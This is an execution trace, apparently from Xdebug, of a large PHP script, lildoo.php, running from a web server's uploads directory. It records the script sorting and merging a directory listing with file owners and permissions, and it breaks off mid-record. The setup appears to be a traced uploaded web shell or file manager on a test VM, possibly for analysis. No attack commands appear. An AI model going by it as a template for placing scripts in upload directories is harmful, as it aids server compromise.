4		A						/var/www/html/uploads/lildoo.php	943	$array[1] = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4		A						/var/www/html/uploads/lildoo.php	945	$l++
4		A						/var/www/html/uploads/lildoo.php	946	$r--
5	192	0	0.012261	800816	quicksort	1		/var/www/html/uploads/lildoo.php	952	4	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]	0	0	'filename'
5	192	1	0.012306	800816
5	193	0	0.012316	800816	quicksort	1		/var/www/html/uploads/lildoo.php	953	4	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]	1	2	'filename'
6	194	0	0.012359	800816	floor	0		/var/www/html/uploads/lildoo.php	929	1	1.5
6	194	1	0.012372	800848
6	194	R			1
5		A						/var/www/html/uploads/lildoo.php	929	$cmp = '..'
5		A						/var/www/html/uploads/lildoo.php	931	$l = 1
5		A						/var/www/html/uploads/lildoo.php	932	$r = 2
5		A						/var/www/html/uploads/lildoo.php	937	$r--
5		A						/var/www/html/uploads/lildoo.php	941	$tmp = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
5		A						/var/www/html/uploads/lildoo.php	942	$array[1] = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
5		A						/var/www/html/uploads/lildoo.php	943	$array[1] = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
5		A						/var/www/html/uploads/lildoo.php	945	$l++
5		A						/var/www/html/uploads/lildoo.php	946	$r--
6	195	0	0.012516	800816	quicksort	1		/var/www/html/uploads/lildoo.php	952	4	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]	1	0	'filename'
6	195	1	0.012559	800816
6	196	0	0.012566	800816	quicksort	1		/var/www/html/uploads/lildoo.php	953	4	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]	2	2	'filename'
6	196	1	0.012609	800816
5	193	1	0.012616	800816
4	190	1	0.012623	800816
4	197	0	0.012630	800840	sizeof	0		/var/www/html/uploads/lildoo.php	918	1	[0 => ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 1 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	197	1	0.012676	800872
4	197	R			3
4	198	0	0.012689	800840	quicksort	1		/var/www/html/uploads/lildoo.php	918	4	[0 => ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 1 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]	0	2	'filename'
5	199	0	0.012734	800840	floor	0		/var/www/html/uploads/lildoo.php	929	1	1
5	199	1	0.012747	800872
5	199	R			1
4		A						/var/www/html/uploads/lildoo.php	929	$cmp = 'prepend.php'
4		A						/var/www/html/uploads/lildoo.php	931	$l = 0
4		A						/var/www/html/uploads/lildoo.php	932	$r = 2
4		A						/var/www/html/uploads/lildoo.php	936	$l++
4		A						/var/www/html/uploads/lildoo.php	941	$tmp = ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4		A						/var/www/html/uploads/lildoo.php	942	$array[1] = ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']
4		A						/var/www/html/uploads/lildoo.php	943	$array[2] = ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4		A						/var/www/html/uploads/lildoo.php	945	$l++
4		A						/var/www/html/uploads/lildoo.php	946	$r--
5	200	0	0.012896	800840	quicksort	1		/var/www/html/uploads/lildoo.php	952	4	[0 => ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 1 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]	0	1	'filename'
6	201	0	0.012947	800840	floor	0		/var/www/html/uploads/lildoo.php	929	1	0.5
6	201	1	0.012961	800872
6	201	R			0
5		A						/var/www/html/uploads/lildoo.php	929	$cmp = 'lildoo.php'
5		A						/var/www/html/uploads/lildoo.php	931	$l = 0
5		A						/var/www/html/uploads/lildoo.php	932	$r = 1
5		A						/var/www/html/uploads/lildoo.php	941	$tmp = ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']
5		A						/var/www/html/uploads/lildoo.php	942	$array[0] = ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']
5		A						/var/www/html/uploads/lildoo.php	943	$array[1] = ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']
5		A						/var/www/html/uploads/lildoo.php	945	$l++
5		A						/var/www/html/uploads/lildoo.php	946	$r--
6	202	0	0.013101	800840	quicksort	1		/var/www/html/uploads/lildoo.php	952	4	[0 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 2 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]	0	0	'filename'
6	202	1	0.013147	800840
6	203	0	0.013155	800840	quicksort	1		/var/www/html/uploads/lildoo.php	953	4	[0 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 2 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]	1	1	'filename'
6	203	1	0.013199	800840
5	200	1	0.013207	800840
5	204	0	0.013214	800840	quicksort	1		/var/www/html/uploads/lildoo.php	953	4	[0 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 2 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]	2	2	'filename'
5	204	1	0.013258	800840
4	198	1	0.013265	800840
4	205	0	0.013273	800840	array_merge	0		/var/www/html/uploads/lildoo.php	921	2	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]	[0 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 2 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]
4	205	1	0.013342	801280
4	205	R			[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 5 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]
3	181	1	0.013414	800416
3	181	R			[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 5 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]
2		A						/var/www/html/uploads/lildoo.php	1213	$list = [0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 